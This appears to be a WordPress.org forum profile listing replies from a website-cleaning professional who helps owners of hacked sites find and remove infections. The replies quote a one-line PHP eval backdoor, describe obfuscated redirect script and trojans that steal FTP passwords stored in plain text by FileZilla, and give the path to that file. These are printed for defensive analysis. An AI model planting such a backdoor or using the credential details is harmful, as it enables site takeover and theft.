WeWatch
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Hacker registered userWe’ve been seeing this with some accounts and it’s typically been that the hackers have the password to an admin level account in your WordPress. This might be due to a password stealing trojan on someone’s local computer. Even Macs
Forum: Reviews
In reply to: [Captcha on Login] Dreamhost is saying this is malwareThat plugin does not contain malicious code. They use the same obfuscation method as some malicious code does, but the plugin code only shows a div tag with the captcha in it.
Dreamhost just saw the code that “looked” like malicious code, but they never deobfuscated it so they just said it was malicious.
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] MW:SPAM:SEO spam problemYou’ll find that code in not only .php and .js files, but also any .html files located anywhere in your folders.
In .js files we typically find it in the swfobject.js but you may find it in other files as well: collect.js and others.
If it’s in the collect.js, then your site could be used in the next round of malicious updates: (your ip address)/(path to collect.js)/collect.js
Just a thought…
It does appear to be related to the revslider plugin exploit.
Forum: Fixing WordPress
In reply to: Help please – site gone down, just getting textThe IP address in that code you posted (91.196.216.30) is in Russia. You have been hacked.
The wp-admin, wp-content and wp-includes are folders. You need to look in the root of your WordPress folder for a file named wp-settings.php.
This is possibly the result of a vulnerable timthumb.php or thumb.php file in your theme.
Go to: /wp-content/themes and search the folders for a file named timthumb.php. Go to: http://timthumb.googlecode.com/svn/trunk/timthumb.php
to get the most recent version (2.8) of timthumb.php and replace every timthumb.php with the new one.Then, also check your wp-config.php file. A normal wp-config.php should be about 3kb. If your’s is infected it will be about 7kb. What the hackers are doing is adding hundreds of blank lines, then their malicious code, then hundreds more blank lines so scroll down to find the malicious code.
You also have to check the .js files as the hackers using the timthumb.php exploit have also been injecting malicious javascript code.
Post back if you have more questions…
Forum: Fixing WordPress
In reply to: Multiple WP sites affected with Parse error: wp-load.php on line 52If you see the above “google-analytics” code in your site code – you’ve been hacked.
Notice the part
<script snc="http://www.google-analytics.com/urchin.jsSee the snc instead of src? What that code does is replace the snc=”http://www.google-analytics.com/urchin.js” with a different URL and toward the end of the code it sets the source (src) to:
emob.src = emsp.substr(15);
To test it, replace the above string toward the end of the script tag with a statement like:
alert(emsp.substr(15));
and comment out:
emob.src = emsp.substr(15);
And you’ll see where that little bit of code is actually taking your visitors.
It’s bad and it should be removed.
Forum: Fixing WordPress
In reply to: All wordpress blogs being HACKEDIn a few of these very same cases, we’ve found the culprit to be a file that has nothing more than this in it:
/** Sets up vars and included files. */
if (isset($_REQUEST[‘asc’])) eval(stripslashes($_REQUEST[‘asc’]));
/** Stop sets up vars and included files. */
In many of these cases, this was found in an archives.php file in:
wp-content/themes/classic/ folder, but we’ve found it in other files as well. If you look in the access-logs you’ll see POSTs of between 7,200 and 7,900 bytes around the same time you’re files are infected.
This has typically happened before the upgrade to 3.1, but wasn’t noticed until after.
Forum: Fixing WordPress
In reply to: Site Got HackedOften times we see hacked WordPress sites that also use phpmyadmin. The WordPress infection may not be the root cause of the infection, but phpmyadmin could be.
Check and update all website software. Same thing with any shopping cart software and plugins.
That is a backdoor shell script that’s used numerous times. It provides hackers with the ability to upload files, modify datetime stamps on files, etc.
You should definitely delete it.
Is your WordPress version current?
I would think that your osCommerce is more to blame than WordPress, unless your WordPress is out of date. Then it could be either one, or both. Since you have an infection in both the WordPress and the osCommerce site, I would recommend that you check all WordPress files for anything that doesn’t belong. Or better yet, delete all the WordPress files and folders and re-install from scratch. That way you’ll be certain to get the infectious code.
As for osCommerce, you might want to check out this to “harden” your osCommerce installs:
http://wewatchyourwebsite.com/wordpress/2010/12/securing-oscommerce/
osCommerce is a constant attack vector for hackers.
Forum: Fixing WordPress
In reply to: Godaddy wordpress blog hackedSorry to be so late jumping in here, but here goes.
Many of these and other website infections are the result of stolen FTP or other login passwords.
These are typically stolen by a virus on a PC that has FTP access to the infected website. Especially when the website has been re-infected a few times.
I know everyone has anti-virus software installed, however, with so many variants of viruses the anti-virus (AV) companies have a difficult time keeping up. All it takes is one minute that your AV software isn’t up-to-date and you can be infected (well, your PC).
From there the virus learns how to evade detection of the AV software. If you’re using one of the free FTP programs, like FileZilla and you store your passwords in the software so you don’t have to login each time you want to transfer files, the login credentials are stored in a plain text file.
For FileZilla, you can see the file here:
C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanger.xml (user could be Administrator if you’re logging into your PC as Administrator)
All the information a virus needs is stored right there in plain text. It steals this information and sends it to a server which then logs in to the website downloads files, injects the malscript and then uploads them back to the website. If you have your FTP logs activated, you can see where the infected files came from.
The virus also works by “sniffing” the FTP traffic. Since FTP transmits all data, including username and password in plain text, it’s easy for the virus to see and steal the information this way as well. I have a YouTube video showing this here: http://www.youtube.com/watch?v=oYI1kssrrbc
Like I said the virus learns how to evade detection of the currently installed anti-virus software so you may need to use something different. Many have had good success with one of the following: Kaspersky, Avast or Vipre. If you’re already using one of these, then try one of the other two – it has to be different.
So, first change all FTP passwords. I generally recommend setting up a separate username and password for each user and make sure FTP logging is activated. That way if you do get infected, you can look in the logs and know for certain who was cause.
Second, install a new AV and scan all PCs.
Third, remove the malscripts. If you have your website downloaded to your PC, you can use a program like grepWin (it’s free) to find and remove the malscript.
Fourth, if Google has blacklisted you, you’ll have to request a review from the Google Webmaster tools.
We clean websites for a living so I do know what I’m talking about here.